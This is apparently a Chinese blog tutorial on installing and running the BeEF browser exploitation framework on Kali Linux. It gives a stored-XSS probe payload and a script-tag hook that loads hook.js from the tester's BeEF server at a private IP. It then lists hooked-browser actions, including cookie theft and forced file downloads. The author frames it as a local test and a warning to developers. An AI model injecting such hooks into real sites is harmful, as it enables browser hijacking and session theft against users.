【kali linux】beef-xss攻击示例
beef-xss说明
BeEF是“浏览器开发框架”的缩写。它是一个专注于Web浏览器的渗透测试工具。
BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,并从浏览器上下文中对系统进行进一步攻击。
1.安装beef-xss
apt-get install beef-xss
Setting up ruby-http-parser (1.2.1-3) …
Setting up ruby-http-cookie (1.0.3-1) …
Setting up ruby-rest-client (2.0.2-3.1) …
Setting up ruby-rushover (0.3.0-2) …
Setting up ruby-execjs (2.6.0-1) …
Setting up ruby-http (4.4.1-4) …
Setting up ruby-mojo-magick (0.5.6-2) …
Setting up imagemagick (8:6.9.10.23+dfsg-2.1+b2) …
Setting up ruby-uglifier (2.7.2+dfsg-2) …
Setting up ruby-qr4r (0.4.1-1) …
Setting up ruby-twitter (7.0.0-1) …
Setting up beef-xss (0.5.0.0+git20191218-0kali2) …
beef-xss.service is a disabled or a static unit, not starting it.
Processing triggers for kali-menu (2020.1.7) …
Processing triggers for desktop-file-utils (0.24-1) …
Processing triggers for mime-support (3.64) …
Processing triggers for initramfs-tools (0.135+kali1) …
update-initramfs: Generating /boot/initrd.img-5.4.0-kali3-amd64
Processing triggers for hicolor-icon-theme (0.17-2) …
Processing triggers for libc-bin (2.29-9) …
Processing triggers for systemd (244-3) …
Processing triggers for man-db (2.9.0-2) …
Processing triggers for fontconfig (2.13.1-2+b1) …
控制台有如上信息说明安装成功
beef-xss基本使用
1.启动beef-xss
aaa@qq.com:/usr/share# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - beef-xss
Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
Active: active (running) since Sun 2020-08-09 03:30:52 EDT; 5s ago
Main PID: 11463 (ruby)
Tasks: 2 (limit: 2333)
Memory: 49.8M
CGroup: /system.slice/beef-xss.service
└─11463 ruby /usr/share/beef-xss/beef
Aug 09 03:30:52 kali systemd[1]: Started beef-xss.
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...
有如上信息,说明启动成功。通过浏览器输入http://127.0.0.1:3000/ui/panel,即可访问,在启动时会让设置beef账号的密码。到这里说明成功启动。
那么如何判断页面有xss攻击点呢?如下是一个简单的页面,没有做xss的防御的页面。文本框中没有做任何的过滤。在文本框中输入"><script>alert('XSS');</script>如果js成功执行,出现弹框,说明可以进行xss攻击。
这时在文本框中输入<script src="http://192.168.31.188:3000/hook.js"></script>注意ip,我这里是本地测试,所以是自己的ip。如果入库成功。则在列表页面的时候会成功触发该js,然后去请求hook.js。如下所示。
然后这个时候beef控制台会有机器上线。控制台说明
-
Hocked Browers
- online browers 在线浏览器
- offline browers 离线浏览器
-
Detials
- 浏览器、插件版本信息,操作系统信息
-
Logs
- 浏览器动作:焦点变化,鼠标单击,信息输入
-
commands
- 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见
- 红色模块:表示模块不适用当前用户,有些红色模块也可以执行
- 橙色模块:模块可用,但结果对用户可见
- 灰色模块:模块为在目标浏览器上测试过
2.简单测试
2.1给目标发一个弹框
2.2可输入的弹框
2.3跳转页面
2.4播放一个音乐
2.5获取目标cookie
2.6让目标下载一个文件
当然还有更多强大的功能有网络扫描,地址位置获取等等,这里就不再介绍了,总的就是想表达xss的危险性。在开发的过程中也要对此进行一定防范。
参考地址:beef-xss官方说明